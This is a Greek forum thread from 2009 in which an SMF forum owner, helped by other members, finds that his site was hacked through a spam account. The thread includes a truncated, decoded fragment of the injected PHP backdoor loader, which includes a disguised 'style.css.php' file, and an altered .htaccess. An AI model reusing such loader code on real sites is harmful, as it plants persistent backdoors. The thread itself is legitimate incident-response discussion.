Χανονται τα avantars!

triantis7 · September 02, 2009, 03:54:25 PM

Παίδες φεύγουν τα avantars απο τα προφιλ των μελων!

Ξερετε τι μπορει να παιζει?
Τα avantars δεν διαγραφονται απο τον καταλογο που γινονται upload απλα δεν εμφανιζονται πλεον στα προφιλ.
Και να το βαλω παλι θα βγει μετα απο κανα 20ημερο!!

agridoc · September 02, 2009, 07:50:40 PM

Δες αν υπάρχει χρήστης Krisbarteo.

Δες και αυτό 1.1.8/2.0 RC1 Exploit Utility - kb_scan.php.

Εύχομαι να μην είναι hack, δεν αποκλείεται όμως. Ελεγξε και με FTP τις ημερομηνίες των PHP αρχείων σου, για τυχόν τροποποιήσεις.

triantis7 · September 06, 2009, 05:30:38 PM

Ωχ οντως υπάρχει!!
Και ειναι σπαμ πως μου ξεφυγε...

τον διεγραψα... αυτο εφταιγε λες?

agridoc · September 06, 2009, 10:17:56 PM

Το οτι υπήρχε σημαίνει οτι ενδεχομένως να έχει γίνει hacking μέσω του avatar του, χωρίς να είναι σίγουρο.

Δες το θέμα που έδωσα παραπάνω, διόρθωσα και το link. Δεν απάντησες για τις ημερομηνίες των PHP αρχείων, θα έχουν αλλάξει αν έχει γίνει hack.

triantis7 · September 07, 2009, 05:51:35 PM

ποια php να κοιταξω περισσότερο?

Τα περισσότερα έχουν ίδια ημερομηνία.. Για ρίξε μια ματια να μου πεις...

triantis7 · September 08, 2009, 12:16:12 PM

Quote from: agridoc on September 02, 2009, 07:50:40 PM

Δες και αυτό 1.1.8/2.0 RC1 Exploit Utility - kb_scan.php.

Λοιπον εκανα upload αυτο το αρχειάκι,το έτρεξα και εκτος απο 3 αρχεια που ειναι κιτρινα, όλα τα άλλα ειναι κόκκινα!!!! με εσκισαν μάλλον ε?? Πατάω fix αλλα δεν κάνει τίποτα!

*Υπόψην το site Μου κατατάλλα δουλεύει μια χαρά!

agridoc · September 09, 2009, 10:33:00 PM

Απ' ότι δείχνουν τα πράγματα το site σου "χτυπήθηκε" στις 15 Ιουνίου 2009.

Ο χρόνος είναι αρκετός έως τώρα. Ξανατρέξε το kb_scan.php. Θέλει χρόνο για να καθαρίσει τα αρχεία.
Δες επίσης [NOTICE] How to secure your site against recent attacks, Hacked, script injection.

Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.

leftezi · September 11, 2009, 08:58:15 PM

Ερώτηση: To 2.0 RC 1-2 είναι ασφαλές σε αυτό το θέμα ή θέλει κι αυτό διόρθωση;

agridoc · September 11, 2009, 09:39:16 PM

Τα SMF 1.1.9, 2.0 RC1-2 και μεταγενέστερα δεν είναι εύκολο να προσβληθούν από το συγκεκριμένο hack.

ΠΡΟΣΟΧΗ όμως: Η αναβάθμιση δεν αποτελεί λύση για ήδη προσβεβλημένο site (αν πάει και καλά). Πρέπει πρώτα να εξαλειφθούν οι παρεμβάσεις του hack και μετά να γίνει αναβάθμιση.

triantis7 · September 12, 2009, 09:40:39 AM

Quote from: agridoc on September 09, 2009, 10:33:00 PM
Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.

Τα αρχεία που ανέβασα σε φοτος ποιο πάνω είναι ολα στο /public_html/Themes/default.
Αυτο με ρωτάς?

triantis7 · September 12, 2009, 10:20:13 AM

Πάντως το kb_scan δεν εχει κανει τιποτα!
Δεν ξερω γιατι.παλι ολα κοκκινα ειναι εκτος 3 που ειναι κιτρινα!

agridoc · September 12, 2009, 03:59:56 PM

Quote from: triantis7 on September 12, 2009, 09:40:39 AM
Quote from: agridoc on September 09, 2009, 10:33:00 PM
Σε ποιο κατάλογο είναι εγκατεστημένο το SMF; Το συγκεκριμένο hacking, απ' όσο ξέρω, επηρεάζει όλα τα αρχεία PHP του καταλόγου που αντιστοιχεί στο domain, όχι μόνο του SMF.

Τα αρχεία που ανέβασα σε φοτος ποιο πάνω είναι ολα στο /public_html/Themes/default.
Αυτο με ρωτάς?

Οχι, πρέπει να ελέγξεις όλα τα αρχεία PHP στους καταλόγους από την ρίζα του domain και κάτω.

Δώσε ένα link για το site, αν δεν θέλεις δημόσια στείλε ΠΜ.

triantis7 · September 14, 2009, 04:03:11 PM

Λοιπόν το έψαξα αρκετά!!

Εχω φαει hack απο krisbarteo!!
Τα εχω παρει μου εχει βαλει ενα κομμάτι κώδικα σχεδόν σε όλα τα php αρχεία μου!!!
Θα πρέπει ειτε να κανω φρεσκο install η να αφαιρέσω τον κώδικα απο ένα ενα αρχεία!!

Επίσης μια ερώτηση!

Το αρχείο .htaccess τι πρέπει να γράφει μέσα?
Βλέπω κάποια παλιά μου backups και το .htaccess μέσα λέει

Code Select

Options All

Αυτο που εχω τωρα ομως στο site μου λεει μεσα

Code Select

<Files *>
	Order Deny,Allow
	Deny from all
	Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml

Είναι απο κάποιο Update αυτο (δηλαδη φυσιολογικό?) η εχει πειραχτεί και αυτό και θα έπρεπε να λέει μέσα αυτο?

Code Select

Options All

triantis7 · September 14, 2009, 04:34:02 PM

Μετα απο decode του base64 κωδικα να τι γράφει:

Code Select

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/streetba/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/streetba/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20........................κτλ κτλ

Αυτος ο φάκελος 32 τι ρολο βαραει?
Εχει μεσα 3000 εγγραφες!!!!

andreaspetr · September 17, 2009, 10:38:10 PM

Μολις ανακαλυψα οτι ο ιδιος εχει χτυπησει και στο δικο μου Forum!

dimitrisglaros · September 18, 2009, 03:28:57 AM

Quote from: andreaspetr on September 17, 2009, 10:38:10 PM
Μολις ανακαλυψα οτι ο ιδιος εχει χτυπησει και στο δικο μου Forum!

Τουλάχιστον ξέρουμε τι πρέπει να κάνουμε!

News:

Χανονται τα avantars!